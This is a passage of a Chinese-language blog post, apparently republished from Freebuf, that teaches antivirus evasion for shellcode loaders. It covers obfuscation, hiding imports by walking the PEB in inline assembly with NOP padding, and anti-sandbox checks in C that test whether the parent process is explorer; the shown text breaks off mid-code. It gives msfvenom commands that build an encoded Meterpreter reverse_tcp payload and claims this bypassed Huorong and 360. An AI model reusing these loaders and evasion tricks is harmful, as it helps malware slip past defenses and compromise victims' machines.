<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="本文首发于Freebuf，转载请联系站方。  0x00作为一个web狗，对免杀这块是一直没办法深入学习，在恶补了些二进制基础后，开启了我的免杀之路(doge) 0x01 shellcode混淆网上的免杀教程基本都会提的一个概念，把shellcode进行混淆从而避免杀软的检测，是在静态检测层面的bypass 混淆的方法有很多，Base64 异或 自定义加解密算法各种乱七八糟的组合起来，脑洞大或者多">
<meta property="og:type" content="article">
<meta property="og:title" content="一个菜鸟的免杀之路（一）">
<meta property="og:url" content="http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/index.html">
<meta property="og:site_name" content="hangchuanin&#39;s blog">
<meta property="og:description" content="本文首发于Freebuf，转载请联系站方。  0x00作为一个web狗，对免杀这块是一直没办法深入学习，在恶补了些二进制基础后，开启了我的免杀之路(doge) 0x01 shellcode混淆网上的免杀教程基本都会提的一个概念，把shellcode进行混淆从而避免杀软的检测，是在静态检测层面的bypass 混淆的方法有很多，Base64 异或 自定义加解密算法各种乱七八糟的组合起来，脑洞大或者多">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://image.3001.net/images/20220717/1658029653_62d386558b52107633b84.png!small">
<meta property="og:image" content="https://image.3001.net/images/20220717/1658029702_62d3868624fcd43fe4200.png!small">
<meta property="og:image" content="https://image.3001.net/images/20220717/1658029751_62d386b7c32a5c8c696fa.png!small">
<meta property="article:published_time" content="2022-07-17T03:55:26.000Z">
<meta property="article:modified_time" content="2022-12-14T08:38:54.387Z">
<meta property="article:author" content="hangchuanin">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image.3001.net/images/20220717/1658029653_62d386558b52107633b84.png!small">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>一个菜鸟的免杀之路（一）</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/rss2.xml" title="hangchuanin's blog" type="application/rss+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/hangchuanin">Projects</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/rss2.xml">RSS</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&text=一个菜鸟的免杀之路（一）"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&is_video=false&description=一个菜鸟的免杀之路（一）"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=一个菜鸟的免杀之路（一）&body=Check out this article: http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&title=一个菜鸟的免杀之路（一）"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&name=一个菜鸟的免杀之路（一）&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://hangchuanin.github.io/2022/07/17/%E4%B8%80%E4%B8%AA%E8%8F%9C%E9%B8%A1%E7%9A%84%E5%85%8D%E6%9D%80%E4%B9%8B%E8%B7%AF%EF%BC%88%E4%B8%80%EF%BC%89/&t=一个菜鸟的免杀之路（一）"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00"><span class="toc-number">1.</span> <span class="toc-text">0x00</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-shellcode%E6%B7%B7%E6%B7%86"><span class="toc-number">2.</span> <span class="toc-text">0x01 shellcode混淆</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E5%8E%BB%E9%99%A4%E5%AF%BC%E5%85%A5%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%95%8F%E6%84%9F%E5%87%BD%E6%95%B0%E4%BF%A1%E6%81%AF"><span class="toc-number">3.</span> <span class="toc-text">0x02 去除导入表中的敏感函数信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%8F%8D%E6%B2%99%E7%AE%B1"><span class="toc-number">4.</span> <span class="toc-text">0x03 反沙箱</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x030-%E6%A3%80%E6%B5%8B%E7%88%B6%E8%BF%9B%E7%A8%8B%E6%98%AF%E5%90%A6%E4%B8%BAexplore"><span class="toc-number">4.1.</span> <span class="toc-text">0x030 检测父进程是否为explore</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x031-%E6%A3%80%E6%B5%8B%E7%A1%AC%E4%BB%B6%E8%B5%84%E6%BA%90"><span class="toc-number">4.2.</span> <span class="toc-text">0x031 检测硬件资源</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x032-%E6%A3%80%E6%B5%8B%E8%99%9A%E6%8B%9F%E6%9C%BA%E7%89%B9%E5%BE%81%E5%80%BC"><span class="toc-number">4.3.</span> <span class="toc-text">0x032 检测虚拟机特征值</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0320-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8-Device-VBoxGuest%E8%AE%BE%E5%A4%87%E6%96%87%E4%BB%B6"><span class="toc-number">4.3.1.</span> <span class="toc-text">0x0320 检测是否存在\\Device\\VBoxGuest设备文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0321-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%AE%BE%E5%A4%87%E5%90%8D%E5%8C%85%E5%90%AB-VBOX-%E5%85%B3%E9%94%AE%E5%AD%97%E6%88%96%E8%80%85-VMWARE-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">4.3.2.</span> <span class="toc-text">0x0321 检测是否存在设备名包含 VBOX 关键字或者 VMWARE 关键字</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0322-%E6%A3%80%E6%B5%8B%E8%99%9A%E6%8B%9F%E6%9C%BA%E4%B8%AD%E7%89%B9%E6%9C%89%E7%9A%84%E8%BF%9B%E7%A8%8B"><span class="toc-number">4.3.3.</span> <span class="toc-text">0x0322 检测虚拟机中特有的进程</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0323-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%99%9A%E6%8B%9F%E6%9C%BA%E7%89%B9%E6%9C%89%E7%9A%84%E6%B3%A8%E5%86%8C%E8%A1%A8%E9%94%AE%E5%80%BC"><span class="toc-number">4.3.4.</span> <span class="toc-text">0x0323 检测是否存在虚拟机特有的注册表键值</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x0324-%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%99%9A%E6%8B%9F%E6%9C%BA%E7%89%B9%E6%9C%89%E7%9A%84%E6%96%87%E4%BB%B6"><span class="toc-number">4.3.5.</span> <span class="toc-text">0x0324 检测是否存在虚拟机特有的文件</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x033-%E6%A3%80%E6%B5%8B%E7%B3%BB%E7%BB%9F%E7%8E%AF%E5%A2%83%E5%90%AF%E5%8A%A8%E6%97%B6%E9%97%B4"><span class="toc-number">4.4.</span> <span class="toc-text">0x033 检测系统环境启动时间</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x034-%E6%A0%B9%E6%8D%AE%E5%BE%AE%E6%AD%A5%E6%B2%99%E7%AE%B1%E7%89%B9%E5%BE%81%E6%9D%A5%E5%8F%8D%E6%B2%99%E7%AE%B1"><span class="toc-number">4.5.</span> <span class="toc-text">0x034 根据微步沙箱特征来反沙箱</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E6%8A%8Ashellcode%E6%94%BE%E5%88%B0%E8%B5%84%E6%BA%90%E6%96%87%E4%BB%B6%E9%87%8C%E9%9D%A2"><span class="toc-number">5.</span> <span class="toc-text">0x04 把shellcode放到资源文件里面</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-shellcode%E5%88%86%E7%A6%BB"><span class="toc-number">6.</span> <span class="toc-text">0x05 shellcode分离</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-%E8%BF%9C%E7%A8%8B%E7%BA%BF%E7%A8%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">7.</span> <span class="toc-text">0x06 远程线程注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x07-APC%E6%B3%A8%E5%85%A5"><span class="toc-number">8.</span> <span class="toc-text">0x07 APC注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x08-%E5%8A%A0%E8%8A%B1%E6%8C%87%E4%BB%A4"><span class="toc-number">9.</span> <span class="toc-text">0x08 加花指令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x09-%E4%BD%BF%E7%94%A8%E5%85%B6%E5%AE%83API%E4%BB%A3%E6%9B%BF%E6%95%8F%E6%84%9FAPI"><span class="toc-number">10.</span> <span class="toc-text">0x09 使用其它API代替敏感API</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x10-DLL%E5%8A%AB%E6%8C%81%E5%8A%A0%E8%BD%BDshellcode"><span class="toc-number">11.</span> <span class="toc-text">0x10 DLL劫持加载shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x11-%E5%8F%82%E8%80%83"><span class="toc-number">12.</span> <span class="toc-text">0x11 参考</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        一个菜鸟的免杀之路（一）
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">hangchuanin</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-07-17T03:55:26.000Z" itemprop="datePublished">2022-07-17</time>
        
      
    </div>


      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E5%85%8D%E6%9D%80/">免杀</a>
    </div>

<div class="article-tag">
    <i class="fa fa-eye"></i>
    <span id="busuanzi_container_page_uv">
      <span id="busuanzi_value_page_uv"></span>
    </span>
</div>
      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <blockquote>
<p>本文首发于<a target="_blank" rel="noopener" href="https://tttang.com/archive/1714/">Freebuf</a>，转载请联系站方。</p>
</blockquote>
<h2 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h2><p>作为一个web狗，对免杀这块是一直没办法深入学习，在恶补了些二进制基础后，开启了我的免杀之路(doge)</p>
<h2 id="0x01-shellcode混淆"><a href="#0x01-shellcode混淆" class="headerlink" title="0x01 shellcode混淆"></a>0x01 shellcode混淆</h2><p>网上的免杀教程基本都会提的一个概念，把shellcode进行混淆从而避免杀软的检测，是在静态检测层面的bypass</p>
<p>混淆的方法有很多，Base64 异或 自定义加解密算法各种乱七八糟的组合起来，脑洞大或者多尝试基本可以bypass杀软对 shellcode 的静态检测</p>
<h2 id="0x02-去除导入表中的敏感函数信息"><a href="#0x02-去除导入表中的敏感函数信息" class="headerlink" title="0x02 去除导入表中的敏感函数信息"></a>0x02 去除导入表中的敏感函数信息</h2><p>有的杀软会对可执行文件中的导入表进行检查里面有无敏感函数(比如 VirtualAlloc)，检查到了就做出警告或者直接杀掉可执行文件</p>
<p>可以通过函数指针的方式去调用函数，这样在导入表里面是没有通过函数指针调用的函数信息的，自然也就bypass杀软对导入表的检测了，可以通过下面的代码获取VirtualAlloc函数的地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HMODULE hModule =LoadLibrary(_T(&quot;Kernel32.dll&quot;));</span><br><span class="line">GetProcAddress(hModule,&quot;VirtualAlloc&quot;);</span><br></pre></td></tr></table></figure>

<p>上面的代码中用到了LoadLibrary函数，而这个函数也是有些杀软盯紧的函数呢，那么我们还可以通过PEB来获取到要加载的DLL地址</p>
<p>三环的FS段寄存器指向TEB结构体，TEB[0x30]指向对应的PEB结构体，PEB[0x0c]指向PEB_LDR_DATA结构体，PEB_LDR_DATA[0x1c]是PEB_LDR_DATA.InInitializationOrderModuleList成员，这个成员是一个LIST_ENTRY结构体，LIST_ENTRY结构体的两个成员都指向LIST_ENTRY，其实就是构成一个双向链表，这个双向链表串着进程模块初始化的顺序</p>
<p><img src="https://image.3001.net/images/20220717/1658029653_62d386558b52107633b84.png!small"></p>
<p>通过上面说的双向链表就能找到Kernel32模块的地址，实现代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">_asm &#123;</span><br><span class="line">    mov esi, fs:[0x30]  //获得PEB结构体首地址</span><br><span class="line">    mov esi, [esi + 0xc]  //获得PEB_LDR_DATA结构体首地址</span><br><span class="line">    mov esi, [esi + 0x1c]  //获得LIST_ENTRY结构体首地址</span><br><span class="line">    mov esi, [esi]  //沿着链表往下找</span><br><span class="line">    mov esi, [esi]</span><br><span class="line">    mov esi, [esi + 0x8]  //Kernel32.dll模块的地址</span><br><span class="line">    mov hModule, esi</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这样就实现了LoadLibrary函数的作用，绕过杀软的检测</p>
<p>上面的代码可能也会被检测，那么加一些NOP指令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">_asm &#123;</span><br><span class="line">    mov esi, fs:[0x30]  //获得PEB结构体首地址</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    mov esi, [esi + 0xc]  //获得PEB_LDR_DATA结构体首地址</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    mov esi, [esi + 0x1c]  //获得LIST_ENTRY结构体首地址</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    mov esi, [esi]  //沿着链表往下找</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    mov esi, [esi]</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    mov esi, [esi + 0x8]  //Kernel32.dll模块的地址</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    NOP</span><br><span class="line">    mov hModule, esi</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=x lport=x -f exe</code>生成的shellcode就是通过遍历双向链表的方法找到需要加载的模块地址的</p>
<p>都没对shellcode进行混淆处理就bypasss火绒 360了(<code>msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b &#39;\x00&#39; lhost=x lport=x  -f c -o shell.c</code>)</p>
<p><img src="https://image.3001.net/images/20220717/1658029702_62d3868624fcd43fe4200.png!small"></p>
<h2 id="0x03-反沙箱"><a href="#0x03-反沙箱" class="headerlink" title="0x03 反沙箱"></a>0x03 反沙箱</h2><p>很多杀软都会把可执行文件上传到云沙箱里面进行模拟可执行文件的执行，观察可执行文件执行后的行为来判断可执行文件是否为恶意文件</p>
<p>我们需要在可执行文件逻辑里检测当前环境是否为云沙箱或者虚拟机环境，如果是则执行一些正常的代码逻辑，如果不是才执行我们的shellcode，这是一种对抗杀软云沙箱或者人工手动放虚拟机执行的一种方案</p>
<h3 id="0x030-检测父进程是否为explore"><a href="#0x030-检测父进程是否为explore" class="headerlink" title="0x030 检测父进程是否为explore"></a>0x030 检测父进程是否为explore</h3><p>我们平时在桌面上点击一个可执行文件的时候，可执行文件进程是由explore进程(桌面进程)进行创建出来的，explore进程就是可执行文件进程的父进程</p>
<p>对应的我们就可以通过检测可执行文件的父进程是否为explore进程来判断当前是否为沙箱环境</p>
<p>完整代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;tlhelp32.h&quot;</span></span></span><br><span class="line"></span><br><span class="line">HMODULE hKernel32HMODULE;</span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">获取一个进程的父进程</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">DWORD <span class="title function_">GetParentProcessId</span><span class="params">(DWORD PID)</span>&#123;</span><br><span class="line">    PROCESSENTRY32 pe32;</span><br><span class="line">    DWORD ParentProcessId = <span class="number">-1</span>;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="title function_">HANDLE</span><span class="params">(WINAPI* pCreateToolhelp32Snapshot)</span><span class="params">(DWORD dwFlags,DWORD th32ProcessID)</span>;</span><br><span class="line">    pCreateToolhelp32Snapshot CreateToolhelp32Snapshot;</span><br><span class="line">    CreateToolhelp32Snapshot = (pCreateToolhelp32Snapshot)GetProcAddress(hKernel32HMODULE,<span class="string">&quot;CreateToolhelp32Snapshot&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(CreateToolhelp32Snapshot == <span class="literal">NULL</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;GetParentProcessId error...&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        HANDLE handle = CreateToolhelp32Snapshot(<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">        BOOL bMore = Process32First(handle,&amp;pe32);</span><br><span class="line">        <span class="keyword">while</span>(bMore)&#123;</span><br><span class="line">            <span class="keyword">if</span>(pe32.th32ParentProcessID == PID)&#123;</span><br><span class="line">                ParentProcessId = pe32.th32ParentProcessID;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            	bMore = Process32Next(handle,&amp;pe32);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> ParentProcessId;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">获取explorer进程的PID</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">DWORD <span class="title function_">GetexplorerProcessId</span><span class="params">()</span>&#123;</span><br><span class="line">    PROCESSENTRY32 pe32;</span><br><span class="line">    DWORD explorerProcessId = <span class="number">-1</span>;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="title function_">HANDLE</span><span class="params">(WINAPI* pCreateToolhelp32Snapshot)</span><span class="params">(DWORD dwFlags,DWORD th32ProcessID)</span>;</span><br><span class="line">    pCreateToolhelp32Snapshot CreateToolhelp32Snapshot;</span><br><span class="line">    CreateToolhelp32Snapshot = (pCreateToolhelp32Snapshot)GetProcAddress(hKernel32HMODULE,<span class="string">&quot;CreateToolhelp32Snapshot&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(CreateToolhelp32Snapshot == <span class="literal">NULL</span>)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;GetexplorerProcessId error...&quot;</span>);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        HANDLE handle = CreateToolhelp32Snapshot(<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">        BOOL bMore = Process32First(handle,&amp;pe32);</span><br><span class="line">        <span class="keyword">while</span>(bMore)&#123;</span><br><span class="line">            <span class="keyword">if</span>(_stricmp((CHAR*)pe32.szExeFile,<span 